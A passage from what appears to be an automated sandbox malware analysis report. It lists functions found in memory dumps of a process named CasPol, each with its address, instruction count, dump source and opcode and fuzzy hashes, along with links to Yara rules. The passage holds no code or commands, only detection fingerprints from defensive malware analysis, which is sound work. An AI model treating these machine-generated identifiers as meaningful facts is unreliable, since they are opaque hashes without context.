                                  • Opcode Fuzzy Hash: e3e117a8e8563bac402fed5409c578aefdc28ba2238b9ad1ccde7e01f26946ec
                                  • Instruction Fuzzy Hash: 67517C30B002158FCB54EB78C098A6D7BF6BF88341B1584B8E906DB3A5EF799C41CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037592A Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ae5da2718590a150bf56677bc0f059470881f13a586603452c9848d7e36d550
                                  • Instruction ID: 10dc1771c6d20828d364656665948d843e7150ba7992dad75adb640a1feb4886
                                  • Opcode Fuzzy Hash: 6ae5da2718590a150bf56677bc0f059470881f13a586603452c9848d7e36d550
                                  • Instruction Fuzzy Hash: D851F431A00209DFDB48CFA8C584AADBBF2BF85310F21C569D505AB265DB79ED42CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037AB64 Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbcc8c1aa0686f4a9d3b98df0042359a301906bed4bc4c79f14a48925fdcea81
                                  • Instruction ID: 49fc5c71f5121a8565843802092dd009de4c8d8014e442948eaa9459647646b1
                                  • Opcode Fuzzy Hash: cbcc8c1aa0686f4a9d3b98df0042359a301906bed4bc4c79f14a48925fdcea81
                                  • Instruction Fuzzy Hash: F041E36574D3C55FE70797B49C296263FB24F97204F0A84FBD549CF2A3E9289C098392
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203754E8 Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c538812890f6172c95cd286ce952e13bbe0da72305ba4bc8421dc47111632ced
                                  • Instruction ID: c82d0a8618b4da495b1eb5fed10109a87efbe823c03e465de782527bdb8c2075
                                  • Opcode Fuzzy Hash: c538812890f6172c95cd286ce952e13bbe0da72305ba4bc8421dc47111632ced
                                  • Instruction Fuzzy Hash: 34410831A00609DFDB08DFA9C480A9EB7F6FF88350B55C529D806AB255DB74E942CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376D84 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3e18e1855acb3e801dc383f660ac9ffc26c7f566966fed2c5acc7873aab4926
                                  • Instruction ID: 4ee72a5c6701fb7310bea4e36885864fb4be95acc1e72a344b99c8f2d30b8e4c
                                  • Opcode Fuzzy Hash: c3e18e1855acb3e801dc383f660ac9ffc26c7f566966fed2c5acc7873aab4926
                                  • Instruction Fuzzy Hash: 2E41E875B193944FC702DBB89854A9E7FF29F8A204F1580AAD549CB3A3EA349C05C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F840 Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 602077af6f1ab9e11bccf141c4893e59c6eaf2de9849271e135ccf6d40593a81
                                  • Instruction ID: 433a93700dab162ecb019eaf060eb7488401bf516af50f6ee0cd072a4dd388f8
                                  • Opcode Fuzzy Hash: 602077af6f1ab9e11bccf141c4893e59c6eaf2de9849271e135ccf6d40593a81
                                  • Instruction Fuzzy Hash: B031A134B402545FCB48E7B984A876E7AE2AFC9354B25447DD50ACB791EE3DDC028782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F87C Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c25e378c2b446e2e83de00638e356e86df7abb601cfafe8e266acedbe98469e
                                  • Instruction ID: 309a506d11b84069e5b8468fb1102b779338284a7e73b9d717e85d4f01bf7cac
                                  • Opcode Fuzzy Hash: 8c25e378c2b446e2e83de00638e356e86df7abb601cfafe8e266acedbe98469e
                                  • Instruction Fuzzy Hash: 9931B271B042545FCB48EBB984A436E7FF2AFC9344B11487DD50ACB391EE388C018796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037BBA0 Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ad1b235f1405e344af1797f679b7c68999f616c20a1788f660b030c92d08a33
                                  • Instruction ID: 9ff2cd66cc301702f4dd62d013aefa7e97b432fdb44ff0b2940e8dd41c98b6cd
                                  • Opcode Fuzzy Hash: 2ad1b235f1405e344af1797f679b7c68999f616c20a1788f660b030c92d08a33
                                  • Instruction Fuzzy Hash: 3F312835B153984FD706DBB9C8247AA3BFA9F85340F0580BAE509DB392EE38CD458752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C6784 Relevance: .1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46921c9cb0ec51539fa1f367b27f5ea39ad2f8a3c8f48d642a24a37e7474b579
                                  • Instruction ID: a7eeb6630f0653d0b320a49fa5e700a27f31860eefa71752552618c7379dee56
                                  • Opcode Fuzzy Hash: 46921c9cb0ec51539fa1f367b27f5ea39ad2f8a3c8f48d642a24a37e7474b579
                                  • Instruction Fuzzy Hash: 0631C574B043558FD745DB7CC8546AE7BF2AF89310B1440AAE50DC7391EA35AC05C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C85A0 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd912d94034ff7ef20a677e5a81f43fa919b57b05cb56f34eff5d02320071f22
                                  • Instruction ID: 7cd45d3efc035042765b96163b7dc6bbe812c321d68f241e3e7e53f730389965
                                  • Opcode Fuzzy Hash: cd912d94034ff7ef20a677e5a81f43fa919b57b05cb56f34eff5d02320071f22
                                  • Instruction Fuzzy Hash: 3B31F375B042454FCB52EB7C8850AAE7BF6AB89310B118079E50CDB392EE34ED028793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375488 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6312e36b91ca69bee6f2b189d8fd7c7885d2726ddb8b03a1a908abf4b1d9189
                                  • Instruction ID: 162ba65d4c44e5fb55b94861eb953d135fff224f4a643d4815683b70d5f79cdd
                                  • Opcode Fuzzy Hash: c6312e36b91ca69bee6f2b189d8fd7c7885d2726ddb8b03a1a908abf4b1d9189
                                  • Instruction Fuzzy Hash: A131D232A04385DFD709CFA8C850A9EBBF2AF4A300F55C469D405EB2A2D7B9DC46CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C4381 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0d7e2218d5c42adf3cbd0ebb9f35759cf71a674768a12a9058b40421c16c44c
                                  • Instruction ID: 87f773ddc798dc1d9aa608c4ba8bf38eb84358abd3671aca55476bd46300c28b
                                  • Opcode Fuzzy Hash: c0d7e2218d5c42adf3cbd0ebb9f35759cf71a674768a12a9058b40421c16c44c
                                  • Instruction Fuzzy Hash: 1C414674A052298FCB61DB28C988698BBF5FF48314F1481D9E80DA3755DB315E91DF02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376EFF Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c37f22cb7150c6f891b4f131399cdfa9b2d46b0d6ad8850ca39e80b777538b4a
                                  • Instruction ID: e8cd3313a585e5c244a9d9c38dff415858229e275929ea524fe77a9c82efdc83
                                  • Opcode Fuzzy Hash: c37f22cb7150c6f891b4f131399cdfa9b2d46b0d6ad8850ca39e80b777538b4a
                                  • Instruction Fuzzy Hash: D431F975B082948FC742DB7CD854AAF7FF1AF89204B1440AED449DB392EA34ED05C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F718 Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6995f177f21e66117bbb5e28f919090c3b283ac19887ae118fdba87194e7cc70
                                  • Instruction ID: 984603ebc21f4115e871e22b423ca6ae2e2537bce2623708d38f8cc6123de1c8
                                  • Opcode Fuzzy Hash: 6995f177f21e66117bbb5e28f919090c3b283ac19887ae118fdba87194e7cc70
                                  • Instruction Fuzzy Hash: 3431EA35B053988FCB02DBB8D454AAE7FF5AF89250B1480ADD54CDB392EA34DC02C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20378319 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ba2ca2b2202a2c83b7be537d72e3ee6f213d15bb912373a3ef2e17be8c7ab45
                                  • Instruction ID: dde5945272f98ff4ab57ae0f2a9034aaf5d5e312a2e47cd1253361dfcb4b0470
                                  • Opcode Fuzzy Hash: 4ba2ca2b2202a2c83b7be537d72e3ee6f213d15bb912373a3ef2e17be8c7ab45
                                  • Instruction Fuzzy Hash: 8231DB35B493548FDB02DB7C985496E7FF69F89210B1480AAD50CDB392EA38DD01C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B5B9 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5fd0426dc624a8bf898b6d8a4d6d4293486395b32330f09a2112ea16d387701f
                                  • Instruction ID: c4ca2cb5ecd349f54c4c9e264e551dd56485965e3bae5cbe674dea3d1a419417
                                  • Opcode Fuzzy Hash: 5fd0426dc624a8bf898b6d8a4d6d4293486395b32330f09a2112ea16d387701f
                                  • Instruction Fuzzy Hash: 8921EA35B053448FCB02DBBCC55469E7FF59F89610B1580AAD50DD73A2EA38ED01C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20373920 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98d2fdf1d415f5b30b6e8cb242131213d88e9ea88eb7c41c9594c18b7b2150ec
                                  • Instruction ID: f3b2e25602d4bf7cd2b5c33bf47af47af8c797ecfe90c824f9146f8e4d78f378
                                  • Opcode Fuzzy Hash: 98d2fdf1d415f5b30b6e8cb242131213d88e9ea88eb7c41c9594c18b7b2150ec
                                  • Instruction Fuzzy Hash: 881138323082555FDB0B9BB84C205AE3FF7AFC9160715405EE546CB392CE298C1293A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203753AC Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f0b857ff558d9bab3cd555455bb887e978107a8599fb4b15322460f57bbbebd
                                  • Instruction ID: 4d37bf6e3d78588c94ce1fee00b5cccc1cce7f754841e203ad5d11b08fa6ffe9
                                  • Opcode Fuzzy Hash: 7f0b857ff558d9bab3cd555455bb887e978107a8599fb4b15322460f57bbbebd
                                  • Instruction Fuzzy Hash: 29110676F052548FCB41DBB9C450AAEBFF5AF8925071480ADD10DE73A1EA34AD02C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037878C Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c5f55851b1a1c37ec3faff44db2f9354bc1e2cac7cf68189776393dedb1ab1d
                                  • Instruction ID: 3818052c0c2daaff5ad66e08f3d38278231035f5978906e8fd5442fff7bf7317
                                  • Opcode Fuzzy Hash: 4c5f55851b1a1c37ec3faff44db2f9354bc1e2cac7cf68189776393dedb1ab1d
                                  • Instruction Fuzzy Hash: 8321A275F062948FCB41EBB8845466E7BF69F8925072480AED10DD73A1EA349D01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203788AC Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8ae1e1dcac7180d3633909518c7e07b4e379b24c0effb1ab1bb97ff5b762fe2
                                  • Instruction ID: 72d19e39ac8da372317c51fdaeccbc170862048e0e765a928616f4530f0b8b94
                                  • Opcode Fuzzy Hash: b8ae1e1dcac7180d3633909518c7e07b4e379b24c0effb1ab1bb97ff5b762fe2
                                  • Instruction Fuzzy Hash: 2811E975F052588FCB41DBB884505AEBFF59F8E25071480ADD149D7391EA349D02C793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203789E8 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68f806a9ae38e9c8f8864d7f8b1d8da63bd088005200e0cd5913a4409804c9a6
                                  • Instruction ID: ea0a2d769d5cb0781613b8e8bedbcaa60acf5b94adcd8396ab0374adefda2c19
                                  • Opcode Fuzzy Hash: 68f806a9ae38e9c8f8864d7f8b1d8da63bd088005200e0cd5913a4409804c9a6
                                  • Instruction Fuzzy Hash: 1611D031B401189BCB04EBB8C4542AEBBF6DFC8365F144079D906E7390EE398D0187A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374500 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b9b3253bbe8ff37e4690964ae6615c0e8e7dd59bbbac050daf273762209dad5
                                  • Instruction ID: 662cea530b2c7446168f545839cc26226d16ce8f3e271ed39dbd1ac474ad9556
                                  • Opcode Fuzzy Hash: 4b9b3253bbe8ff37e4690964ae6615c0e8e7dd59bbbac050daf273762209dad5
                                  • Instruction Fuzzy Hash: F101FE72B052562FD701CAA58C5097F7BBEEFC1174706C679E604CF291D634DD0483A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037666C Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da84f6600e85472c238b65820f581038fd96ebdcd73a5d5850110e8b03a62e3d
                                  • Instruction ID: e9af3236fdead05e8d60371e4ac4291ae2ec8bc6c89e0a20447725f4373344ba
                                  • Opcode Fuzzy Hash: da84f6600e85472c238b65820f581038fd96ebdcd73a5d5850110e8b03a62e3d
                                  • Instruction Fuzzy Hash: 74110431B142948FD745ABBC846866E7FF69FC9254B0941BED406CB3A1EE388C098793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B618 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28d4e6f5ec1c90b546e37526be65c8515d21319a190a276d74c884eaa9c34b8d
                                  • Instruction ID: c890c7cf828a64d5a56e9ef4bd46c11c1092c635602fb35cb72d3e35290cbc61
                                  • Opcode Fuzzy Hash: 28d4e6f5ec1c90b546e37526be65c8515d21319a190a276d74c884eaa9c34b8d
                                  • Instruction Fuzzy Hash: 4C116575F002188FCB41EBBCC554AAE7BF6AB8C6507208069D60DE7354EE34AD028BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376E40 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 105e2577b9464080190996873f307db3893cf42b54fb9da16cd6d1c72e7a037f
                                  • Instruction ID: 52535b12a4bb552066cec4383076527c78aab2e088feb134ee560a56bc420a75
                                  • Opcode Fuzzy Hash: 105e2577b9464080190996873f307db3893cf42b54fb9da16cd6d1c72e7a037f
                                  • Instruction Fuzzy Hash: 3E112575F011188FCB41EBBDC554AAEBBF6AB8C650720806DD50DE7354EE34AD018BE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203788C8 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ee6080a2205b80760209369db11e5ac2a8d1b99f384d476721892b0a14d2eeb
                                  • Instruction ID: 5b63dbf4228e5653e50949367cf6f2c0f37d69aa6959fbb3f7f8a98848365894
                                  • Opcode Fuzzy Hash: 6ee6080a2205b80760209369db11e5ac2a8d1b99f384d476721892b0a14d2eeb
                                  • Instruction Fuzzy Hash: 88112975F001188FCB51EBBDC554AAEBBF5AB8D650710806DD50DE7394EE34AD028792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20378378 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 779148f682eb5b806bce52f765caf17b020452d60bee2980e8040e4631498caa
                                  • Instruction ID: 841607a9c3db2f3f3630a8a965cea88775ae4a2a603738b365f4fbabb58673b2
                                  • Opcode Fuzzy Hash: 779148f682eb5b806bce52f765caf17b020452d60bee2980e8040e4631498caa
                                  • Instruction Fuzzy Hash: 61112575F001188FCB41EBBDD554AAEBBFAAB8C650720806DD50DE7355EE34AD01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F778 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bcf32cb2f66516535332d1c98a69d4e38d8e667078f41b9487ec35e8e5bb537a
                                  • Instruction ID: 77bc778c4fe52bdf2edf5ca79ef397492ad720e433869f18fd3ea3d7eda2ee30
                                  • Opcode Fuzzy Hash: bcf32cb2f66516535332d1c98a69d4e38d8e667078f41b9487ec35e8e5bb537a
                                  • Instruction Fuzzy Hash: 40116175F001188FCB40EBBCD450AAEBBF6AB8C650720806DD50DE7354EE34AD018BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376F60 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e044caacccdab3f818c06807bae5e444249bf5eb9fad2325148f66741088337
                                  • Instruction ID: 77514893b4229ffdb89886760d5e09b9e36cea41716f19b5111be07eeaa3f95b
                                  • Opcode Fuzzy Hash: 6e044caacccdab3f818c06807bae5e444249bf5eb9fad2325148f66741088337
                                  • Instruction Fuzzy Hash: 92112575F001188FCB41EBBDD854AAFBBF6AB8C6507208069D50DE7354EE34AD019BE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203787A8 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48e01055b549c0022ac57339fbb15a29730329772972332f64315288f723d225
                                  • Instruction ID: a6939fdfe18e64bd7bbff48af72c9f4abd8e01a9b960bbe1160ea8bb965b82aa
                                  • Opcode Fuzzy Hash: 48e01055b549c0022ac57339fbb15a29730329772972332f64315288f723d225
                                  • Instruction Fuzzy Hash: 26116575F012189FCB40EBBDC454AAE7BF6AB8C650720806DD50DE7354EE34AD028BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203753C8 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c8b709af96f6ca2b1c5b7f05396ebf2b62a0489d5c73c1b07348483e895cf7e
                                  • Instruction ID: b7a880c432abc1d7d3cf9ee6eb752c7919591b4b1315237674b061b01b386a88
                                  • Opcode Fuzzy Hash: 1c8b709af96f6ca2b1c5b7f05396ebf2b62a0489d5c73c1b07348483e895cf7e
                                  • Instruction Fuzzy Hash: CB115676F001188FCB44EBBDC454A9E7BF6AB8C6507508069D50DE7354EE34AD028792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203789CC Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc9f57d4a777979955ebfe20149c864716f26e526c6c8036c97d11b050fd939b
                                  • Instruction ID: e7094b3f40382b01aedda41f749135a4e0ea6f83e4db5511c03694ac3527c435
                                  • Opcode Fuzzy Hash: fc9f57d4a777979955ebfe20149c864716f26e526c6c8036c97d11b050fd939b
                                  • Instruction Fuzzy Hash: D1010432B052984FCB41EBB8846829FBFF5DF89314F0400BAD506E7281EA285D0583A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F304 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
